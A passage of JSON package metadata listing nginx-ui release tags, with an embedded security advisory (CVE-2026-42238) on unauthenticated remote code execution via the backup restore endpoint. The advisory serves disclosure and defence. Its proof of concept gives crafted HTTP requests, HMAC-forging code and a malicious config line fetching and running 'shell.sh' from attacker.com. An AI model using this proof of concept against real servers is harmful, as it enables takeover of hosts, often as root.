3729c53f259c566774adee7f87b6b0126","kind":"commit","published_at":"2022-07-23T06:10:41.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.4.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"1aa4e70c555942a80e22fcadb11f4d1922ee602e","kind":"commit","published_at":"2022-07-17T16:36:34.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.4.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"eac9669f0a492b1dc2947944a0f7ea1f3e9254e8","kind":"commit","published_at":"2022-07-07T12:28:23.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.4.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.0/manifests"},{"name":"v1.4.0-rc1","sha":"3c56bf19ca258499c77905a8a063041b3cf344cd","kind":"commit","published_at":"2022-07-06T16:04:57.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.4.0-rc1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.4.0-rc1/manifests"},{"name":"v1.3.3-rc1","sha":"a571bccb84718c5c2794b2295ba67e25590d5653","kind":"commit","published_at":"2022-07-05T12:04:02.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.3-rc1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.3-rc1/manifests"},{"name":"v1.3.2","sha":"1803f1308f6b6e60390717ae1efdd59acdf1be2d","kind":"commit","published_at":"2022-06-21T03:12:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.2/manifests"},{"name":"v1.3.1-fix","sha":"3b632252fbc754e6d64512710310b46946b0b282","kind":"commit","published_at":"2022-06-14T12:38:55.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.1-fix","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.1-fix","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.1-fix","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.1-fix","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.1-fix/manifests"},{"name":"v1.3.1","sha":"72ba2a9c97d32bdf42834ef9c1056a32974197b4","kind":"commit","published_at":"2022-06-14T05:50:44.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.1/manifests"},{"name":"v1.3.0","sha":"8c3e4819c04a6d1955d4f3935abb32818f327592","kind":"commit","published_at":"2022-06-12T16:44:17.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.0/manifests"},{"name":"v1.3.0-rc1","sha":"b3cf13ad504ca55293689aa629f202b533eb762b","kind":"commit","published_at":"2022-05-08T11:55:34.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.3.0-rc1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.3.0-rc1/manifests"},{"name":"v1.2.2","sha":"0fe9bf56d6673a801e9ae18221616be0c0a7f500","kind":"commit","published_at":"2022-05-06T06:59:58.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"74a48d34620f5a9ee3001a2062b5eaa598b056af","kind":"commit","published_at":"2022-04-23T01:51:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"8b60d61b8e54db17590e30b2f21ae6759c9fa89a","kind":"commit","published_at":"2022-03-15T14:19:10.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0/manifests"},{"name":"v1.2.0-rc.3","sha":"8b60d61b8e54db17590e30b2f21ae6759c9fa89a","kind":"commit","published_at":"2022-03-15T14:19:10.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-rc.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.3/manifests"},{"name":"v1.2.0-rc.2","sha":"77dfd6444535d0dddbf14d74bc7eb9d9ce43a2f3","kind":"commit","published_at":"2022-03-07T09:30:45.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-rc.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.2/manifests"},{"name":"v1.2.0-rc.1","sha":"b1ea269b54c41b8f8e939aedca079f9a57bdc7d7","kind":"commit","published_at":"2022-03-03T16:59:38.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-rc.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-rc.1/manifests"},{"name":"v1.2.0-alpha.4","sha":"aebfef1b2eac215831aaa05ba0ac6657e1e6ffd0","kind":"commit","published_at":"2022-02-27T15:49:14.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-alpha.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.4/manifests"},{"name":"v1.2.0-alpha.3","sha":"1b4abab47f6321fc3dfd5dd4b82f0565dfb33050","kind":"commit","published_at":"2022-02-24T13:06:44.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-alpha.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.3/manifests"},{"name":"v1.2.0-alpha.2","sha":"15db0ae48420ac51cb393c8adc0d30d2e665a7e5","kind":"commit","published_at":"2022-02-20T17:13:26.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.2.0-alpha.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.2.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.2.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.2.0-alpha.2/manifests"},{"name":"v1.1.0","sha":"882fe8c07459ded8ed0b5088fd04443f7362b358","kind":"commit","published_at":"2022-01-27T07:04:27.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v1.1.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v1.1.0/manifests"}]},"repo_metadata_updated_at":"2026-09-23T17:17:02.066Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/0xJacky/Nginx-UI","advisories":[{"uuid":"GSA_kwCzR0hTQS00cHZnLXBycjMtOWN4cs4ABWSi","url":"https://github.com/advisories/GHSA-4pvg-prr3-9cxr","title":"Nginx-UI is Vulnerable to Unauthenticated Remote Code Execution via Backup Restore","description":"**Product:** nginx-ui\n**Repository:** `0xJacky/nginx-ui` (branch: `dev`)\n**Vulnerability Class:** Authentication Bypass → Arbitrary File Write → OS Command Injection\n**Affected Component:** `POST /api/restore`\n\n---\n\n## 1. Vulnerability Summary\n\nnginx-ui exposes a backup restore endpoint (`POST /api/restore`) that is **completely unauthenticated** during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application's configuration file (`app.ini`) and SQLite database. Because the attacker controls the restored `app.ini`, they can inject an arbitrary OS command into the `TestConfigCmd` setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui — typically `root` in Docker deployments.\n\nThe 10-minute unauthenticated window resets on every process restart, making this exploitable not only on initial deployments but on any restart event (container restart, upgrade, health-check-triggered restart).\n\n---\n\n## 2. Root Cause Analysis\n\n### 2.1 The Restore Route Is Registered Without Authentication\n\n`backup.InitRouter` is called on the `root` group, which carries only `IPWhiteList()` middleware — no `AuthRequired()`: [1](#2-0) \n\nThe route definition: [2](#2-1) \n\n### 2.2 The `authIfInstalled` Guard Has a Time-Bounded Bypass\n\nThe only authentication guard on the restore route is `authIfInstalled`: [3](#2-2) \n\nIt calls `AuthRequired()` only when `InstallLockStatus() || IsInstallTimeoutExceeded()` is true. Both conditions are false on a fresh install within the first 10 minutes: [4](#2-3) \n\n- `InstallLockStatus()` returns `false` because `JwtSecret` is `\"\"` on a fresh install and `SkipInstallation` defaults to `false`.\n- `IsInstallTimeoutExceeded()` returns `false` for the first 10 minutes after `startupTime` is set in `init()`.\n\nWhen both are `false`, `authIfInstalled` calls `ctx.Next()` with **zero authentication**.\n\n### 2.3 The `EncryptedForm` Middleware Is Not a Security Barrier\n\nThe `EncryptedForm()` middleware between `authIfInstalled` and `RestoreBackup` is **optional** — it only activates if the request includes an `encrypted_params` field. If that field is absent, it calls `c.Next()` immediately: [5](#2-4) \n\nAn attacker sends a plain `multipart/form-data` request without `encrypted_params` and the middleware is a no-op.\n\n### 2.4 The Attacker Controls the AES Key Used to Verify the Backup\n\nThe restore handler accepts the AES key and IV directly from the attacker via the `security_token` form field: [6](#2-5) \n\nThe manifest integrity check derives its HMAC signing key **from the attacker-supplied AES key**: [7](#2-6) \n\nSince the attacker crafts the backup and supplies the key, they can produce a valid HMAC signature for any manifest content they choose. The integrity check is self-referential and provides no security against a crafted backup.\n\n### 2.5 Restore Overwrites `app.ini` and the SQLite Database Unconditionally\n\nWhen `restore_nginx_ui=true`, `restoreNginxUIConfig` directly copies files from the backup onto disk with no content validation: [8](#2-7) \n\n### 2.6 Restored `TestConfigCmd` Is Executed as a Shell Command\n\nAfter restore, `risefront.Restart()` is called, reloading `app.ini`: [9](#2-8) \n\nOn the next call to `TestConfig()`, the value of `TestConfigCmd` from the restored `app.ini` is passed verbatim to `/bin/sh -c`: [10](#2-9) [11](#2-10) \n\n---\n\n## 3. Attack Prerequisites\n\n| Requirement | Notes |\n|---|---|\n| Network access to nginx-ui port | Default: 9000/tcp |\n| Target is a fresh install | `JwtSecret` is empty in `app.ini` |\n| Within 10 minutes of last process start | Window resets on every restart |\n| IP not blocked by `IPWhiteList` | Default config has no IP whitelist |\n\nThe 10-minute window is not a meaningful mitigation in practice. Docker containers restart frequently due to health checks, upgrades, and orchestrator rescheduling. Any restart resets `startupTime` via `init()`, reopening the window.\n\n---\n\n## 4. Step-by-Step Proof of Concept\n\n### Step 1 — Confirm the installation window is open\n\n```http\nGET /api/install HTTP/1.1\nHost: target:9000\n```\n\nExpected response confirming vulnerability:\n```json\n{\"lock\": false, \"timeout\": false}\n```\n\n### Step 2 — Craft the malicious backup\n\nThe backup format (derived from `internal/backup/backup.go`) is:\n\n```\nbackup-TIMESTAMP.zip          ← outer ZIP (unencrypted)\n├── manifest.json             ← JSON manifest\n├── manifest.sig              ← HMAC-SHA256 of manifest.json\n├── nginx-ui.zip              ← AES-CBC encrypted inner ZIP\n└── nginx.zip                 ← AES-CBC encrypted inner ZIP\n```\n\n**2a.** Generate a random 32-byte AES key and 16-byte IV.\n\n**2b.** Create the malicious `app.ini` to place inside `nginx-ui.zip`:\n\n```ini\n[app]\nJwtSecret = attacker_chosen_jwt_secret_32chars\n\n[node]\nSecret = attacker_chosen_node_secret\n\n[nginx]\nTestConfigCmd = curl http://attacker.com/shell.sh|sh\n```\n\n**2c.** Create a SQLite database (`nginx-ui.db`) with a known bcrypt hash for the admin user (optional — the node secret alone grants full API access).\n\n**2d.** Package `app.ini` and `nginx-ui.db` into `nginx-ui.zip`. Package an empty or minimal `nginx.zip`.\n\n**2e.** Encrypt both ZIPs with AES-256-CBC using your key and IV.\n\n**2f.** Compute SHA-256 hashes and sizes of the encrypted ZIPs. Build `manifest.json`:\n\n```json\n{\n  \"schema\": 1,\n  \"created_at\": \"20260421-120000\",\n  \"version\": \"2.0.0\",\n  \"files\": [\n    {\"name\": \"nginx-ui.zip\", \"sha256\": \"\u003chash\u003e\", \"size\": \u003csize\u003e},\n    {\"name\": \"nginx.zip\",    \"sha256\": \"\u003chash\u003e\", \"size\": \u003csize\u003e}\n  ]\n}\n```\n\n**2g.** Compute the HMAC-SHA256 signature of `manifest.json` using the signing key derived as:\n\n```python\nimport hashlib, hmac\ncontext = b\"nginx-ui-backup-signing-v1:\"\nsigning_key = hashlib.sha256(context + aes_key).digest()\nsig = hmac.new(signing_key, manifest_bytes, hashlib.sha256).hexdigest()\n```\n\n**2h.** Assemble the outer ZIP containing `manifest.json`, `manifest.sig`, `nginx-ui.zip`, `nginx.zip`.\n\n### Step 3 — Upload the malicious backup (no authentication required)\n\n```http\nPOST /api/restore HTTP/1.1\nHost: target:9000\nContent-Type: multipart/form-data; boundary=----Boundary\n\n------Boundary\nContent-Disposition: form-data; name=\"backup_file\"; filename=\"evil.zip\"\nContent-Type: application/zip\n\n[crafted backup bytes]\n------Boundary\nContent-Disposition: form-data; name=\"security_token\"\n\n\u003cbase64(aes_key)\u003e:\u003cbase64(aes_iv)\u003e\n------Boundary\nContent-Disposition: form-data; name=\"restore_nginx_ui\"\n\ntrue\n------Boundary--\n```\n\nExpected response (HTTP 200):\n```json\n{\"nginx_ui_restored\": true, \"nginx_restored\": false, \"hash_match\": true}\n```\n\nnginx-ui calls `risefront.Restart()` 2 seconds later, loading the attacker's `app.ini`.\n\n### Step 4 — Trigger RCE using the restored node secret\n\nAfter the restart (wait ~3 seconds):\n\n```http\nPOST /api/nginx/test HTTP/1.1\nHost: target:9000\nX-Node-Secret: attacker_chosen_node_secret\n```\n\nnginx-ui executes:\n```sh\n/bin/sh -c \"curl http://attacker.com/shell.sh|sh\"\n```\n\nThe attacker now has a reverse shell running as the nginx-ui process user (typically `root` in Docker).\n\n---\n\n## 5. Impact\n\n- **Confidentiality:** Full read access to all nginx configurations, TLS private keys, database contents, and secrets stored in `app.ini`.\n- **Integrity:** Arbitrary modification of all nginx configurations and nginx-ui application state.\n- **Availability:** Complete denial of service; nginx and nginx-ui can be stopped or misconfigured.\n- **Scope:** OS-level code execution. In Docker deployments (the primary distribution method), nginx-ui runs as root, giving the attacker full host access if the container has host mounts or privileged mode.\n\n---\n\n## 6. Affected Versions\n\nAll versions of nginx-ui where `authIfInstalled` is used as the sole authentication guard on `POST /api/restore`. The vulnerability is present in the current `dev` branch.\n\n---\n\n## 7. Recommended Fix\n\n**Primary fix** — Require authentication unconditionally on the restore endpoint. The \"allow restore during initial setup\" design rationale does not justify unauthenticated access to a file-write primitive:\n\n```go\n// api/backup/router.go\nfunc InitRouter(r *gin.RouterGroup) {\n    r.GET(\"/backup\", middleware.AuthRequired(), CreateBackup)\n    r.POST(\"/restore\", middleware.AuthRequired(), middleware.EncryptedForm(), RestoreBackup)\n}\n```\n\nIf restore-during-setup is a required feature, it should be gated on a one-time setup token generated at startup and printed to the server console (similar to how Jenkins handles initial setup), not on a time window.\n\n**Secondary fix** — Validate the content of restored `app.ini` before writing it to disk. Specifically, `TestConfigCmd`, `ReloadCmd`, and `RestartCmd` should be rejected or stripped from any externally-supplied backup.\n\n---\n\n## 8. Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-21 | Vulnerability identified via source code review |\n| — | Vendor notification (pending) |\n| — | CVE assignment (pending) |\n\n### Citations\n\n**File:** router/routers.go (L61-70)\n```go\n\troot := r.Group(\"/api\", middleware.IPWhiteList())\n\t{\n\t\tpublic.InitRouter(root)\n\t\tcrypto.InitPublicRouter(root)\n\t\tuser.InitAuthRouter(root)\n\t\tlicense.InitRouter(root)\n\n\t\tsystem.InitPublicRouter(root)\n\t\tsystem.InitSelfCheckRouter(root)\n\t\tbackup.InitRouter(root)\n```\n\n**File:** api/backup/router.go (L9-16)\n```go\n// authIfInstalled requires auth if system is installed\nfunc authIfInstalled(ctx *gin.Context) {\n\tif system.InstallLockStatus() || system.IsInstallTimeoutExceeded() {\n\t\tmiddleware.AuthRequired()(ctx)\n\t} else {\n\t\tctx.Next()\n\t}\n}\n```\n\n**File:** api/backup/router.go (L18-25)\n```go\nfunc InitRouter(r *gin.RouterGroup) {\n\t// Backup always requires authentication (contains sensitive data)\n\tr.GET(\"/backup\", middleware.AuthRequired(), CreateBackup)\n\n\t// Restore requires auth only after installation\n\t// This allows restoring backup during initial setup\n\tr.POST(\"/restore\", authIfInstalled, middleware.EncryptedForm(), RestoreBackup)\n}\n```\n\n**File:** api/system/install.go (L27-34)\n```go\nfunc InstallLockStatus() bool {\n\treturn settings.NodeSettings.SkipInstallation || cSettings.AppSettings.JwtSecret != \"\"\n}\n\n// IsInstallTimeoutExceeded checks if installation time limit (10 minutes) is exceeded\nfunc IsInstallTimeoutExceeded() bool {\n\treturn time.Since(startupTime) \u003e 10*time.Minute\n}\n```\n\n**File:** internal/middleware/encrypted_params.go (L69-75)\n```go\n\t\t// Check if encrypted_params field exists\n\t\tencryptedParams := c.Request.FormValue(\"encrypted_params\")\n\t\tif encryptedParams == \"\" {\n\t\t\t// No encryption, continue normally\n\t\t\tc.Next()\n\t\t\treturn\n\t\t}\n```\n\n**File:** api/backup/restore.go (L35-70)\n```go\n\tsecurityToken := c.PostForm(\"security_token\") // Get concatenated key and IV\n\t// Get backup file\n\tbackupFile, err := c.FormFile(\"backup_file\")\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrBackupFileNotFound, err.Error()))\n\t\treturn\n\t}\n\n\t// Validate security token\n\tif securityToken == \"\" {\n\t\tcosy.ErrHandler(c, backup.ErrInvalidSecurityToken)\n\t\treturn\n\t}\n\n\t// Split security token to get Key and IV\n\tparts := strings.Split(securityToken, \":\")\n\tif len(parts) != 2 {\n\t\tcosy.ErrHandler(c, backup.ErrInvalidSecurityToken)\n\t\treturn\n\t}\n\n\taesKey := parts[0]\n\taesIv := parts[1]\n\n\t// Decode Key and IV from base64\n\tkey, err := base64.StdEncoding.DecodeString(aesKey)\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESKey, err.Error()))\n\t\treturn\n\t}\n\n\tiv, err := base64.StdEncoding.DecodeString(aesIv)\n\tif err != nil {\n\t\tcosy.ErrHandler(c, cosy.WrapErrorWithParams(backup.ErrInvalidAESIV, err.Error()))\n\t\treturn\n\t}\n```\n\n**File:** api/backup/restore.go (L126-132)\n```go\n\tif restoreNginxUI {\n\t\tgo func() {\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t\t// gracefully restart\n\t\t\trisefront.Restart()\n\t\t}()\n\t}\n```\n\n**File:** internal/backup/manifest.go (L156-163)\n```go\nfunc deriveBackupSigningKeyFromAESKey(aesKey []byte) ([]byte, error) {\n\tif len(aesKey) == 0 {\n\t\treturn nil, ErrInvalidAESKey\n\t}\n\n\tsum := sha256.Sum256(append([]byte(manifestKeyContext), aesKey...))\n\treturn sum[:], nil\n}\n```\n\n**File:** internal/backup/restore.go (L458-484)\n```go\n// restoreNginxUIConfig restores nginx-ui configuration files\nfunc restoreNginxUIConfig(nginxUIBackupDir string) error {\n\t// Get config directory\n\tconfigDir := filepath.Dir(cosysettings.ConfPath)\n\tif configDir == \"\" {\n\t\treturn ErrConfigPathEmpty\n\t}\n\n\t// Restore app.ini to the configured location\n\tsrcConfigPath := filepath.Join(nginxUIBackupDir, \"app.ini\")\n\tif err := copyFile(srcConfigPath, cosysettings.ConfPath); err != nil {\n\t\treturn err\n\t}\n\n\t// Restore database file if exists\n\tdbName := settings.DatabaseSettings.GetName()\n\tsrcDBPath := filepath.Join(nginxUIBackupDir, dbName+\".db\")\n\tdestDBPath := filepath.Join(configDir, dbName+\".db\")\n\n\t// Only attempt to copy if database file exists in backup\n\tif _, err := os.Stat(srcDBPath); err == nil {\n\t\tif err := copyFile(srcDBPath, destDBPath); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n```\n\n**File:** internal/nginx/nginx.go (L25-36)\n```go\nfunc TestConfig() (stdOut string, stdErr error) {\n\tmutex.Lock()\n\tdefer mutex.Unlock()\n\tif settings.NginxSettings.TestConfigCmd != \"\" {\n\t\treturn execShell(settings.NginxSettings.TestConfigCmd)\n\t}\n\tsbin := GetSbinPath()\n\tif sbin == \"\" {\n\t\treturn execCommand(\"nginx\", \"-t\")\n\t}\n\treturn execCommand(sbin, \"-t\")\n}\n```\n\n**File:** internal/nginx/exec.go (L12-28)\n```go\nfunc execShell(cmd string) (stdOut string, stdErr error) {\n\tvar execCmd *exec.Cmd\n\n\tif runtime.GOOS == \"windows\" {\n\t\texecCmd = exec.Command(\"cmd\", \"/c\", cmd)\n\t} else {\n\t\texecCmd = exec.Command(\"/bin/sh\", \"-c\", cmd)\n\t}\n\n\texecCmd.Dir = GetNginxExeDir()\n\tbytes, err := execCmd.CombinedOutput()\n\tstdOut = string(bytes)\n\tif err != nil {\n\t\tstdErr = err\n\t}\n\treturn\n}\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-05-06T17:03:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr","https://nvd.nist.gov/vuln/detail/CVE-2026-42238","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8","https://github.com/advisories/GHSA-4pvg-prr3-9cxr"],"source_kind":"github","identifiers":["GHSA-4pvg-prr3-9cxr","CVE-2026-42238"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T18:00:09.102Z","updated_at":"2026-09-25T12:04:01.466Z","epss_percentage":0.00832,"epss_percentile":0.55763,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cHZnLXBycjMtOWN4cs4ABWSi","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cHZnLXBycjMtOWN4cs4ABWSi","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/nginx-ui","versions":[{"first_patched_version":"2.3.8","vulnerable_version_range":"\u003c 